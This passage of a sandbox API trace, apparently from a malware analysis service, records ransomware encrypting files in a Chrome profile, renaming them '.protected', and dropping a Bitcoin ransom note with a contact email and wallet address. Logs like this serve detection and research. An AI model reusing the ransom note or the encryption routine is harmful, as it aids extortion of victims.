cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\*") returned 98 [0084.396] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0084.396] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.396] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.396] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.396] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.396] lstrcmpiW 
(lpString1=".", lpString2="System Volume Information") returned -1 [0084.396] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\.") returned 98 [0084.396] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.396] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.396] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.396] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.396] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.396] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.396] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.396] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\..") returned 99 [0084.396] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.396] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.396] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.396] lstrcmpiW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2="Windows") returned -1 [0084.396] lstrcmpiW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2="Program Files") returned -1 [0084.396] lstrcmpiW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2="Program Files (x86)") returned -1 [0084.396] lstrcmpiW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2="$Recycle.bin") returned 1 [0084.396] lstrcmpiW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2="System Volume Information") returned -1 [0084.396] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned 134 [0084.396] lstrcmpW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2=".") returned 1 [0084.397] lstrcmpW (lpString1="_crx_aohghmighlieiainnegkcijnfilokake", lpString2="..") returned 1 [0084.397] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\*") returned 136 [0084.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0084.397] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.397] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.397] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.397] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.397] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.397] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\.") returned 136 [0084.397] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.397] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.398] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.398] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.398] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.398] lstrcmpiW (lpString1="..", 
lpString2="$Recycle.bin") returned 1 [0084.398] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.398] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\..") returned 137 [0084.398] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.398] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.398] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.398] lstrcmpiW (lpString1="Google Docs.ico", lpString2="Windows") returned -1 [0084.398] lstrcmpiW (lpString1="Google Docs.ico", lpString2="Program Files") returned -1 [0084.398] lstrcmpiW (lpString1="Google Docs.ico", lpString2="Program Files (x86)") returned -1 [0084.398] lstrcmpiW (lpString1="Google Docs.ico", lpString2="$Recycle.bin") returned 1 [0084.398] lstrcmpiW (lpString1="Google Docs.ico", lpString2="System Volume Information") returned -1 [0084.398] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico") returned 150 [0084.398] StrStrIW (lpFirst="Google Docs.ico", lpSrch=".protected") returned 0x0 [0084.398] lstrcmpW (lpString1="Google Docs.ico", lpString2="RESTORE_FILES.txt") returned -1 [0084.398] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.398] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web 
Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico") returned 150 [0084.399] StrStrW (lpFirst="Google Docs.ico", lpSrch=".txt") returned 0x0 [0084.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico") returned 150 [0084.399] StrStrW (lpFirst="Google Docs.ico", lpSrch=".rar") returned 0x0 [0084.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico") returned 150 [0084.399] StrStrW (lpFirst="Google Docs.ico", lpSrch=".zip") returned 0x0 [0084.399] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x2800, lpOverlapped=0x0) returned 1 [0084.405] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.405] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x2800, lpOverlapped=0x0) returned 1 [0084.405] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.405] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.406] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.407] CloseHandle (hObject=0x15c) returned 1 [0084.407] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.protected") returned 160 [0084.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.protected")) returned 1 [0084.408] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.408] lstrcmpiW (lpString1="Google Docs.ico.md5", lpString2="Windows") returned -1 [0084.408] lstrcmpiW (lpString1="Google Docs.ico.md5", lpString2="Program Files") returned -1 [0084.408] lstrcmpiW (lpString1="Google Docs.ico.md5", lpString2="Program 
Files (x86)") returned -1 [0084.408] lstrcmpiW (lpString1="Google Docs.ico.md5", lpString2="$Recycle.bin") returned 1 [0084.408] lstrcmpiW (lpString1="Google Docs.ico.md5", lpString2="System Volume Information") returned -1 [0084.408] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5") returned 154 [0084.408] StrStrIW (lpFirst="Google Docs.ico.md5", lpSrch=".protected") returned 0x0 [0084.408] lstrcmpW (lpString1="Google Docs.ico.md5", lpString2="RESTORE_FILES.txt") returned -1 [0084.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.408] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5") returned 154 [0084.409] StrStrW (lpFirst="Google Docs.ico.md5", lpSrch=".txt") returned 0x0 [0084.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web 
Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5") returned 154 [0084.409] StrStrW (lpFirst="Google Docs.ico.md5", lpSrch=".rar") returned 0x0 [0084.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5") returned 154 [0084.409] StrStrW (lpFirst="Google Docs.ico.md5", lpSrch=".zip") returned 0x0 [0084.409] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x10, lpOverlapped=0x0) returned 1 [0084.410] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.410] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x10, lpOverlapped=0x0) returned 1 [0084.410] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.410] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.410] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.410] CloseHandle (hObject=0x15c) returned 1 [0084.410] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web 
Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.protected") returned 164 [0084.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5.protected")) returned 1 [0084.411] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0084.411] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0084.411] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\RESTORE_FILES.txt") returned 152 [0084.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.423] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.423] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0084.424] lstrlenA (lpString="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") returned 684 [0084.424] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.424] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.424] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0084.424] CloseHandle (hObject=0x158) returned 1 [0084.425] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.425] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.425] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\RESTORE_FILES.txt") returned 114 [0084.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.425] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.425] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.426] lstrlenA (lpString="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") returned 684 [0084.426] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.426] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.426] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.427] CloseHandle (hObject=0x154) returned 1 [0084.427] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.427] lstrcmpiW (lpString1="Web Data", lpString2="Windows") returned -1 [0084.427] lstrcmpiW (lpString1="Web Data", lpString2="Program Files") returned 1 [0084.427] lstrcmpiW (lpString1="Web Data", lpString2="Program Files (x86)") returned 1 [0084.427] lstrcmpiW (lpString1="Web Data", lpString2="$Recycle.bin") returned 1 [0084.427] lstrcmpiW (lpString1="Web Data", lpString2="System Volume Information") returned 1 [0084.427] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 88 [0084.427] StrStrIW (lpFirst="Web Data", lpSrch=".protected") returned 0x0 [0084.427] lstrcmpW (lpString1="Web Data", lpString2="RESTORE_FILES.txt") returned 1 [0084.427] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.427] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 88 [0084.428] StrStrW (lpFirst="Web Data", lpSrch=".txt") returned 0x0 [0084.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 88 [0084.428] StrStrW (lpFirst="Web Data", lpSrch=".rar") returned 0x0 [0084.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 88 [0084.428] StrStrW (lpFirst="Web Data", lpSrch=".zip") returned 0x0 [0084.428] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.429] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.430] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.431] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.431] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.431] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.431] CloseHandle (hObject=0x154) returned 1 [0084.432] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.protected") returned 98 [0084.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
